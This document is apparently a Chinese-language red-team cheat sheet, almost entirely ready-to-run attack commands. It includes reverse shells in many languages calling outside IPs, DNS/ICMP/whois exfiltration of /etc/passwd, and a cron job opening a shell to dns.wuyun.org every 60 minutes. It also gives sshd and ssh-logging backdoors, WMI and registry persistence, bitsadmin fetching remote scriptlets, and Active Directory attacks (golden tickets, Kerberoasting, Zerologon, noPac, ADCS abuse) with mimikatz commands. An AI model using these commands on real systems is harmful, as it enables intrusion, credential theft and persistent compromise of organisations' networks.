['%pwd%123','%user%123','%user%521','%user%2017','%pwd%321','%pwd%521','%user%321','%pwd%123!','%pwd%[email protected]#','%pwd%1234','%user%2016','%user%123$%^','%user%[email protected]#','%pwd%2016','%pwd%2017','%pwd%1!','%pwd%[email protected]','%pwd%3#','%pwd%123#@!','%pwd%12345','%pwd%123$%^','%pwd%[email protected]#456','%pwd%123qwe','%pwd%qwe123','%pwd%qwe','%pwd%123456','%user%123#@!','%user%[email protected]#456','%user%1234','%user%12345','%user%123456','%user%123!']
Linux
dig @ns.example.com example=.com AXFR
Windows
nslookup -type=ns xxx.yyy.cn #查询解析某域名的DNS服务器
nslookup #进入nslookup交互模式
server dns.domian.com #指定dns服务器
ls xxx.yyy.cn #列出域信息
正向 SOCKS v5 服务器:
./ew -s ssocksd -l 1080
反弹 SOCKS v5 服务器: a) 先在一台具有公网 ip 的主机A上运行以下命令:
$ ./ew -s rcsocks -l 1080 -e 8888
b) 在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口
$ ./ew -s rssocks -d 1.1.1.1 -e 8888
多级级联
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
lcx_tran 的用法
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999
lcx_listen、lcx_slave 的用法
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
“三级级联”的本地SOCKS测试用例以供参考
$ ./ew -s rcsocks -l 1080 -e 8888
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
$ ./ew -s lcx_listen -l 9999 -e 7777
$ ./ew -s rssocks -d 127.0.0.1 -e 7777
使用说明:https://rootkiter.com/Termite/README.txt
reGeorg :https://github.com/sensepost/reGeorg Neo-reGeorg:https://github.com/L-codes/Neo-reGeorg pystinger(毒刺):https://github.com/FunnyWolf/pystinger ABPTTS:https://github.com/nccgroup/ABPTTS
bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
nc
#使用-e
nc -e /bin/sh 223.8.200.234 1234
#不使用-e
mknod /tmp/backpipe p
/bin/sh 0/tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe
lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('202.103.243.122','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
wput
wput dir_name ftp://linuxpig:[email protected]/
wget
wget http://site.com/1.rar -O 1.rar
ariac2(需安装)
aria2c -o owncloud.zip https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2
powershell
$p = New-Object System.Net.WebClient
$p.DownloadFile("http://domain/file","C:%homepath%file")
vbs脚本
Set args = Wscript.Arguments
Url = "http://domain/file"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
.type = 1 '
.open
.write xHttp.responseBody
.savetofile " C:\%homepath%\file", 2 '
end with
执行 :cscript test.vbs
Perl
#!/usr/bin/perl
use LWP::Simple;
getstore("http://domain/file", "file");
执行:perl test.pl
Python
#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'w')
localFile.write(u.read())
localFile.close()
执行:python test.py
Ruby
#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.domain.com") { |http|
r = http.get("/file")
open("save_location", "wb") { |file|
file.write(r.body)
}
}
执行:ruby test.rb
PHP
<?php
$url = 'http://www.example.com/file';
$path = '/path/to/file';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($ch);
curl_close($ch);
file_put_contents($path, $data);
?>
执行:php test.php
NC attacker
cat file | nc -l 1234
target
nc host_ip 1234 > file
FTP
ftp 127.0.0.1 username password get file exit
TFTP
tftp -i host GET C:%homepath%file location_of_file_on_tftp_server
Bitsadmin
bitsadmin /transfer n http://domain/file c:%homepath%file
Window 文件共享
net use x: \127.0.0.1\share /user:example.comuserID myPassword
SCP 本地到远程
scp file [email protected]:/tmp
远程到本地
scp [email protected]:/tmp file
rsync 远程rsync服务器中拷贝文件到本地机
rsync -av [email protected]::www /databack
本地机器拷贝文件到远程rsync服务器
rsync -av /databack [email protected]::www
certutil.exe
certutil.exe -urlcache -split -f http://site.com/file
copy
copy \\IP\ShareName\file.exe file.exe
WHOIS 接收端 Host B:
nc -vlnp 1337 | sed "s/ //g" | base64 -d
发送端 Host A:
whois -h host_ip -p 1337 `cat /etc/passwd | base64`
WHOIS + TAR First:
ncat -k -l -p 4444 | tee files.b64 #tee to a file so you can make sure you have it
Next
tar czf - /tmp/* | base64 | xargs -I bits timeout 0.03 whois -h host_ip -p 4444 bits
Finally
cat files.b64 | tr -d '\r\n' | base64 -d | tar zxv #to get the files out
PING 发送端:
xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done
接收端ping_receiver.py:
import systry:
from scapy.all import *
except:
print("Scapy not found, please install scapy: pip install scapy")
sys.exit(0)
def process_packet(pkt):
if pkt.haslayer(ICMP):
if pkt[ICMP].type == 8:
data = pkt[ICMP].load[-4:]
print(f'{data.decode("utf-8")}', flush=True, end="", sep="")
sniff(iface="eth0", prn=process_packet)
python3 ping_receiver.py
DIG 发送端:
xxd -p -c 31 /etc/passwd | while read line; do dig @172.16.1.100 +short +tries=1 +time=1 $line.gooogle.com; done
接收端dns_reciver.py:
try:
from scapy.all import *
except:
print("Scapy not found, please install scapy: pip install scapy")def process_packet(pkt):
if pkt.haslayer(DNS):
domain = pkt[DNS][DNSQR].qname.decode('utf-8')
root_domain = domain.split('.')[1]
if root_domain.startswith('gooogle'):
print(f'{bytearray.fromhex(domain[:-13]).decode("utf-8")}', flush=True, end='')
sniff(iface="eth0", prn=process_packet)
python3 dns_reciver.py
...
python2
python -m SimpleHTTPServer 1337
python3
python -m http.server 1337
PHP 5.4+
php -S 0.0.0.0:1337
ruby
ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start'
ruby -run -e httpd . -p 1337
Perl
perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start'
perl -MIO::All -e 'io(":8080")->fork->accept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })'
busybox httpd
busybox httpd -f -p 8000
windows用户列表 分析邮件用户,内网[域]邮件用户,通常就是内网[域]用户
析杀毒软件/安全监控工具等 邮件客户端 VPN ftp等
与安全防范工具有关服务[判断是否可以手动开关等] 存在问题的服务[权限/漏洞]
开放端口对应的常见服务/应用程序[匿名/权限/漏洞等] 利用端口进行信息收集
分析 Windows 补丁 第三方软件[Java/Oracle/Flash 等]漏洞
本机共享列表/访问权限 本机访问的域共享/访问权限
历史记录 收藏夹 文档等
ipconfig:
ipconfig /all ------> 查询本机 IP 段,所在域等
net:
net user ------> 本机用户列表
net localgroup administrators ------> 本机管理员[通常含有域用户]
net user /domain ------> 查询域用户
net group /domain ------> 查询域里面的工作组
net group "domain admins" /domain ------> 查询域管理员用户组
net localgroup administrators /domain ------> 登录本机的域管理员
net localgroup administrators workgroup\user001 /add ----->域用户添加到本机 net group "Domain controllers" -------> 查看域控制器(如果有多台)
net view ------> 查询同一域内机器列表 net view /domain ------> 查询域列表
net view /domain:domainname
dsquery
dsquery computer domainroot -limit 65535 && net group "domain
computers" /domain ------> 列出该域内所有机器名
dsquery user domainroot -limit 65535 && net user /domain------>列出该域内所有用户名
dsquery subnet ------>列出该域内网段划分
dsquery group && net group /domain ------>列出该域内分组
dsquery ou ------>列出该域内组织单位
dsquery server && net time /domain------>列出该域内域控制器
检测类:Windows-Exploit-Suggester,WinSystemHelper,wesng
利用类:windows-kernel-exploits,BeRoot
数据库服务,ftp服务等
PowerUP,ElevateKit
linux-kernel-exploits
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
寻找可利用bin:https://gtfobins.github.io/
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla
WinlogonHack WinlogonHack 是一款用来劫取远程3389登录密码的工具,在 WinlogonHack 之前有 一个 Gina 木马主要用来截取 Windows 2000下的密码,WinlogonHack 主要用于截 取 Windows XP 以及 Windows 2003 Server。键盘记录器 安装键盘记录的目地不光是记录本机密码,是记录管理员一切的密码,比如说信箱,WEB 网页密码等等,这样也可以得到管理员的很多信息。NTPass 获取管理员口令,一般用 gina 方式来,但有些机器上安装了 pcanywhere 等软件,会导致远程登录的时候出现故障,本软件可实现无障碍截取口令。Linux 下 openssh 后门 重新编译运行的sshd服务,用于记录用户的登陆密码。
WMI : 存储:
$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
$StaticClass.Name = 'Win32_Command'
$StaticClass.Put()
$StaticClass.Properties.Add('Command' , $Payload)
$StaticClass.Put()
读取:
$Payload=([WmiClass] 'Win32_Command').Properties['Command'].Value
包含数字签名的PE文件 利用文件hash的算法缺陷,向PE文件中隐藏Payload,同时不影响该PE文件的数字签名 特殊ADS …
type putty.exe > ...:putty.exe
wmic process call create c:\test\ads\...:putty.exe
特殊COM文件
type putty.exe > \\.\C:\test\ads\COM1:putty.exe
wmic process call create \\.\C:\test\ads\COM1:putty.exe
磁盘根目录
type putty.exe >C:\:putty.exe
wmic process call create C:\:putty.exe
用户级
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
管理员
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
由于smss.exe在Windows子系统加载之前启动,因此会调用配置子系统来加载当前的配置单元,具体注册表键值为:
HKLM\SYSTEM\CurrentControlSet\Control\hivelist
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Session Manager
WinLogon进程加载的login scripts,具体键值:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
创建服务
sc create [ServerName] binPath= BinaryPathName
本质上是Internet Explorer启动时加载的DLL模块
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
加载User32.dll会加载的DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
HKEY_LOCAL_MACHINE\Software\Classes
HKEY_CLASSES_ROOT
bitsadmin /create backdoor
bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe
bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://host.com/calc.sct scrobj.dll"
bitsadmin /Resume backdoor
pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP1";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 1";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consP1";
ScriptingEngine = "JScript";
ScriptText = "GetObject(\"script:https://host.com/test\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
管理员执行:
mofcomp test.mof
每隔60秒执行一次notepad.exe
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23", ExecutablePath="C:\Windows\System32\notepad.exe",CommandLineTemplate="C:\Windows\System32\notepad.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""
劫持计划任务UserTask,在系统启动时加载dll
function Invoke-ScheduledTaskComHandlerUserTask
{
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
Param (
[Parameter(Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[String]
$Command,[Switch]
$Force
)
$ScheduledTaskCommandPath = "HKCU:\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}\InprocServer32"
if ($Force -or ((Get-ItemProperty -Path $ScheduledTaskCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){
New-Item $ScheduledTaskCommandPath -Force |
New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null
}else{
Write-Verbose "Key already exists, consider using -Force"
exit
}
if (Test-Path $ScheduledTaskCommandPath) {
Write-Verbose "Created registry entries to hijack the UserTask"
}else{
Write-Warning "Failed to create registry key, exiting"
exit
}
}
Invoke-ScheduledTaskComHandlerUserTask -Command "C:\test\testmsg.dll" -Verbose
netsh add helper c:\test\netshtest.dll
后门触发:每次调用netsh
dll编写:https://github.com/outflanknl/NetshHelperBeacon
常用方式:InjectDll RedirectShortcut RedirectEXE
通过Rattler自动枚举进程,检测是否存在可用dll劫持利用的进程 使用:Procmon半自动测试更精准,常规生成的dll会导致程序执行报错或中断,使用AheadLib配合生成dll劫持利用源码不会影响程序执行 工具:https://github.com/sensepost/rattler 工具:https://github.com/Yonsm/AheadLib
编写自定义Verifier provider DLL 通过Application Verifier进行安装 注入到目标进程执行payload 每当目标进程启动,均会执行payload,相当于一个自启动的方式 POC : https://github.com/Cybellum/DoubleAgent
不支持自启动,但可远程主动激活,后台进程显示为waitfor.exe POC : https://github.com/3gstudent/Waitfor-Persistence
针对.Net程序,通过修改AppDomainManager能够劫持.Net程序的启动过程。如果劫持了系统常见.Net程序如powershell.exe的启动过程,向其添加payload,就能实现一种被动的后门触发机制
劫持Office软件的特定功能:通过dll劫持,在Office软件执行特定功能时触发后门 利用VSTO实现的office后门 Office加载项
参考1 :https://3gstudent.github.io/Use-Office-to-maintain-persistence
参考2 :https://3gstudent.github.io/Office-Persistence-on-x64-operating-system
无需管理员权限的后门,并能够劫持所有.Net程序 POC:https://github.com/3gstudent/CLR-Injection
利用MSDTC服务加载dll,实现自启动,并绕过Autoruns对启动项的检测 利用:向 %windir%\system32\目录添加dll并重命名为oci.dll
利用COM组件,不需要重启系统,不需要管理员权限 通过修改注册表实现 POC:https://github.com/3gstudent/COM-Object-hijacking
COM组件劫持,不需要重启系统,不需要管理员权限 通过修改注册表实现
HKCU\Software\Classes\CLSID{42aedc87-2188-41fd-b9a3-0c966feabec1}
HKCU\Software\Classes\CLSID{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKCU\Software\Classes\CLSID{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}
HKCU\Software\Classes\Wow6432Node\CLSID{BCDE0395-E52F-467C-8E3D-C4579291692E}
通过DLL劫持,劫持Explorer.exe对fxsst.dll的加载 Explorer.exe在启动时会加载c:\Windows\System32\fxsst.dll(服务默认开启,用于传真服务)将payload.dll保存在c:\Windows\fxsst.dll,能够实现dll劫持,劫持Explorer.exe对fxsst.dll的加载
在注册表启动项创建特殊名称的注册表键值,用户正常情况下无法读取(使用Win32 API),但系统能够执行(使用Native API)。
《渗透技巧——"隐藏"注册表的创建》
《渗透技巧——"隐藏"注册表的更多测试》
替换我的电脑快捷方式启动参数 POC : https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Backdoor/LNK_backdoor.ps1
New-ItemProperty "HKCU:\Environment\" UserInitMprLogonScript -value "c:\test\11.bat" -propertyType string | Out-Null
每60分钟反弹一次shell给dns.wuyun.org的53端口
#!bash
(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -
#!bash
ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333;
链接:ssh [email protected] -p 2333
#!bash
cd /usr/sbin
mv sshd ../bin
echo '#!/usr/bin/perl' >sshd
echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
chmod u+x sshd
//不用重启也行
/etc/init.d/sshd restart
socat STDIO TCP4:192.168.206.142:22,sourceport=13377
vim当前用户下的.bashrc文件,末尾添加
#!bash
alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'
source .bashrc
./cymothoa -p 2270 -s 1 -y 7777
nc -vv ip 7777
PHP Meterpreter后门 Aspx Meterpreter后门 weevely webacoo
....
hydra
smb
apache ftp ...
第三方通用组件漏洞: struts thinkphp jboss ganglia zabbix ...
80 web
80-89 web
8000-9090 web
1433 MSSQL
1521 Oracle
3306 MySQL
5432 PostgreSQL
50000 DB2
443 SSL心脏滴血
445 ms08067/ms11058/ms17010等
873 Rsync未授权
5984 CouchDB http://xxx:5984/_utils/
6379 redis未授权
7001,7002 WebLogic默认弱口令,反序列
9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞
11211 memcache未授权访问
27017,27018 Mongodb未授权访问
50000 SAP命令执行
50070,50030 hadoop默认端口未授权访问
21 ftp
22 SSH
23 Telnet
445 SMB弱口令扫描
2601,2604 zebra路由,默认密码zebra
3389 远程桌面
21 ftp
22 SSH
23 Telnet
25 SMTP
53 DNS
69 TFTP
80 web
80-89 web
110 POP3
135 RPC
139 NETBIOS
143 IMAP
161 SNMP
389 LDAP
443 SSL心脏滴血以及一些web漏洞测试
445 SMB
512,513,514 Rexec
873 Rsync未授权
1025,111 NFS
1080 socks
1158 ORACLE EMCTL2601,2604 zebra路由,默认密码zebra案
1433 MSSQL (暴力破解)
1521 Oracle:(iSqlPlus Port:5560,7778)
2082/2083 cpanel主机管理系统登陆 (国外用较多)
2222 DA虚拟主机管理系统登陆 (国外用较多)
2601,2604 zebra路由,默认密码zebra
3128 squid代理默认端口,如果没设置口令很可能就直接漫游内网了
3306 MySQL (暴力破解)
3312/3311 kangle主机管理系统登陆
3389 远程桌面
3690 svn
4440 rundeck 参考WooYun: 借用新浪某服务成功漫游新浪内网
4848 GlassFish web中间件 弱口令:admin/adminadmin
5432 PostgreSQL
5900 vnc
5984 CouchDB http://xxx:5984/_utils/
6082 varnish 参考WooYun: Varnish HTTP accelerator CLI 未授权访问易导致网站被直接篡改或者作为代理进入内网
6379 redis未授权
7001,7002 WebLogic默认弱口令,反序列
7778 Kloxo主机控制面板登录
8000-9090 都是一些常见的web端口,有些运维喜欢把管理后台开在这些非80的端口上
8080 tomcat/WDCd/ 主机管理系统,默认弱口令
8080,8089,9090 JBOSS
8081 Symantec AV/Filter for MSE
8083 Vestacp主机管理系统 (国外用较多)
8649 ganglia
8888 amh/LuManager 主机管理系统默认端口
9000 fcgi fcig php执行
9043 websphere[web中间件] 弱口令: admin/admin websphere/ websphere ststem/manager
9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞
10000 Virtualmin/Webmin 服务器虚拟主机管理系统
11211 memcache未授权访问
27017,27018 Mongodb未授权访问
28017 mongodb统计页面
50000 SAP命令执行
50060 hadoop
50070,50030 hadoop默认端口未授权访问
Get-NetDomain - gets the name of the current user's domain
Get-NetForest - gets the forest associated with the current user's domain
Get-NetForestDomains - gets all domains for the current forest
Get-NetDomainControllers - gets the domain controllers for the current computer's domain
Get-NetCurrentUser - gets the current [domain\]username
Get-NetUser - returns all user objects, or the user specified (wildcard specifiable)
Get-NetUserSPNs - gets all user ServicePrincipalNames
Get-NetOUs - gets data for domain organization units
Get-NetGUIDOUs - finds domain OUs linked to a specific GUID
Invoke-NetUserAdd - adds a local or domain user
Get-NetGroups - gets a list of all current groups in the domain
Get-NetGroup - gets data for each user in a specified domain group
Get-NetLocalGroups - gets a list of localgroups on a remote host or hosts
Get-NetLocalGroup - gets the members of a localgroup on a remote host or hosts
Get-NetLocalServices - gets a list of running services/paths on a remote host or hosts
Invoke-NetGroupUserAdd - adds a user to a specified local or domain group
Get-NetComputers - gets a list of all current servers in the domain
Get-NetFileServers - get a list of file servers used by current domain users
Get-NetShare - gets share information for a specified server
Get-NetLoggedon - gets users actively logged onto a specified server
Get-NetSessions - gets active sessions on a specified server
Get-NetFileSessions - returned combined Get-NetSessions and Get-NetFiles
Get-NetConnections - gets active connections to a specific server resource (share)
Get-NetFiles - gets open files on a server
Get-NetProcesses - gets the remote processes and owners on a remote server
PowerView-2.0-tricks:
https://gist.github.com/HarmJ0y/3328d954607d71362e3c
PowerView-3.0-tricks
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
获取某OU下所有机器信息
{
"name": "Find the specificed OU computers",
"queryList": [
{
"final": false,
"title": "Select a OU...",
"query": "MATCH (n:OU) RETURN distinct n.name ORDER BY n.name DESC"
},
{
"final": true,
"query": "MATCH (m:OU {name: $result}) with m MATCH p=(o:OU {objectid: m.objectid})-[r:Contains*1..]->(n:Computer) RETURN p",
"allowCollapse": true,
"endNode": "{}"
}
]
}
自动标记owned用户及机器
SyncDog
SYSVOL是指存储域公共文件服务器副本的共享文件夹,它们在域中所有的域控制器之间复制。Sysvol文件夹是安装AD时创建的,它用来存放GPO、Script等信息。同时,存放在Sysvol文件夹中的信息,会复制到域中所有DC上。相关阅读:
python ms14-068.py -u 域用户@域名 -p 密码 -s 用户SID -d 域主机
利用mimikatz将工具得到的[email protected]写入内存,创建缓存证书:
mimikatz.exe "kerberos::ptc c:[email protected]" exit
net use k: \pentest.comc$
相关阅读 :
Kerberoast可以作为一个有效的方法从Active Directory中以普通用户的身份提取服务帐户凭据,无需向目标系统发送任何数据包。SPN是服务在使用Kerberos身份验证的网络上的唯一标识符。它由服务类,主机名和端口组成。在使用Kerberos身份验证的网络中,必须在内置计算机帐户(如NetworkService或LocalSystem)或用户帐户下为服务器注册SPN。对于内部帐户,SPN将自动进行注册。但是,如果在域用户帐户下运行服务,则必须为要使用的帐户的手动注册SPN。SPN扫描的主要好处是,SPN扫描不需要连接到网络上的每个IP来检查服务端口,SPN通过LDAP查询向域控执行服务发现,SPN查询是Kerberos的票据行为一部分,因此比较难检测SPN扫描。相关阅读 :
在域上抓取的哈希
lsadump::dcsync /domain:pentest.com /user:krbtgt
kerberos::purge
kerberos::golden /admin:administrator /domain:域 /sid:SID /krbtgt:hash值 /ticket:adinistrator.kiribi
kerberos::ptt administrator.kiribi
kerberos::tgt
net use k: \pnet use k: \pentest.comc$
相关阅读 :
黄金票据和白银票据的一些区别:Golden Ticket:伪造TGT,可以获取任何Kerberos服务权限 银票:伪造TGS,只能访问指定的服务 加密方式不同:Golden Ticket由krbtgt的hash加密 Silver Ticket由服务账号(通常为计算机账户)Hash加密 认证流程不同:金票在使用的过程需要同域控通信 银票在使用的过程不需要同域控通信 相关阅读 :
与上面SPN扫描类似的原理 https://github.com/nidem/kerberoast 获取所有用作SPN的帐户
setspn -T PENTEST.com -Q */*
从Mimikatz的RAM中提取获得的门票
kerberos::list /export
用rgsrepcrack破解
tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
从搜集的密码里面找管理员的密码
用于主动让目标机器发起NTLM请求的方法:
Relay LDAP:
Relay AD CS/PKI:
集成几个利用的工具:
内网445端口转发:
实在搞不定再搞ARP
1、利用Mimikatz check
lsadump::zerologon /target:dc1.exploit.local /account:dc1$
exploit
lsadump::zerologon /target:dc1.exploit.local /account:dc1$ /exploit
dcsync
lsadump::dcsync /dc:dc1.exploit.local /authuser:dc1$ /authdomain:exploit.local /authpassword:"" /domain:exploit.local /authntlm /user:krbtgt
restore
lsadump::postzerologon /target:conttosson.locl /account:dc$
2、利用impacket:
python cve-2020-1472-exploit.py DC2008 10.211.55.200
secretsdump.py -no-pass cgdomain.com/'DC2008$'@10.211.55.200 -history -just-dc-user administrator
secretsdump.py -no-pass cgdomain.com/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:3add1560657a19b3166247eb3eb149ae
获取到旧的密码明文hex,还原
python restorepassword.py cgdomain.com/[email protected] -target-ip 10.211.55.200 -hexpass 59958639cbdd4523de5d42b01adb0e256e0d39aef14c8eef31f4c078862109f253bbb7b3817ab123d013856c028fa4993f5f5b9a830a3a98d87483b29df3fb55082a1f464b19220a2c04f6605d2d321a04afbb551f8f19a13d399f9f5af2aa23c5b76b49001033516fefd90cb0348256e8282b22cbf9e70d82a8b8d2916d578246e288af3af727533d36ad8950fe1c513771377d98a947c4a8eae2b581a74b6687a2e533b7e89e8d03c2e6c2123d519489869a6e33d3a8884be33107060b62e2852502261f48c097ddb68750cc55b7688cc951441cf02989a307f55c008e978edbaf31766d17b53505016c7580cb480b
恢复方法2 通过wmic, pass the hash 拿到域控制器中的本地管理员权限(域管)
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8adfc85c3490040e942ae1e6c68f645e test.local/[email protected]
然后分别执行,拷贝本机中SAM数据库到本地
- reg save HKLM\SYSTEM system.save
- reg save HKLM\SAM sam.save
- reg save HKLM\SECURITY security.save
- get system.save
- get sam.save
- get security.save
- del /f system.save
- del /f sam.save
- del /f security.save
提取明文hash
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
然后恢复。
漏洞分析:CVE-2021-42287/CVE-2021-42278 Weaponisation
Exploit:
# Create Machine Account
New-MachineAccount -MachineAccount TestSPN -Domain internal.zeroday.lab -DomainController idc1.internal.zeroday.lab -Verbose# Clear SPNs
Set-DomainObject "CN=TestSPN,CN=Computers,DC=internal,DC=zeroday,DC=lab" -Clear 'serviceprincipalname' -Verbose
# Change Machine Account samaccountname
Set-MachineAccountAttribute -MachineAccount TestSPN -Value "IDC1" -Attribute samaccountname -Verbose
# Request TGT
.\Rubeus.exe asktgt /user:IDC1 /password:Password1 /domain:internal.zeroday.lab /dc:idc1.internal.zeroday.lab /nowrap
# Change Machine Account samaccountname
Set-MachineAccountAttribute -MachineAccount TestSPN -Value "TestSPN" -Attribute samaccountname -Verbose
# Request S4U2self
.\Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:idc1.internal.zeroday.lab /self /altservice:LDAP/IDC1.internal.zeroday.lab /ptt /ticket:[TGT]
一键利用:noPac
利用ADCS中错误配置的模板进行域提权,详细可参考:Certified_Pre-Owned
可利用工具:
前提:域内有ADCS Exploit:
# 修改可控机器DNS
python certi.py account create cgdomain.com/sanfeng:'[email protected]'@10.211.55.200 -dc-ip 10.211.55.200 -user testvul -dns dc2008.cgdomain.com# 请求证书
python certi.py req 'cgdomain.com/testvul$:NUxhMemzaP4rsPnu'@10.211.55.200 -dc-ip 10.211.55.200 -ca cgdomain-DC2008-CA -template 'Machine'
# 获取DC hash
python certi.py auth -dc-ip 10.211.55.200 -pfx dc2008.pfx -username dc2008$
# 还原机器DNS
python certi.py account update cgdomain.com/sanfeng:'[email protected]'@10.211.55.200 -dc-ip 10.211.55.200 -user testvul -dns testvul.hqcec.com
注:此环境的ADCS与DC为同一台机器。真实环境需要根据实际情况进行参数调整。
mimikatz lsadump::lsa /inject exit
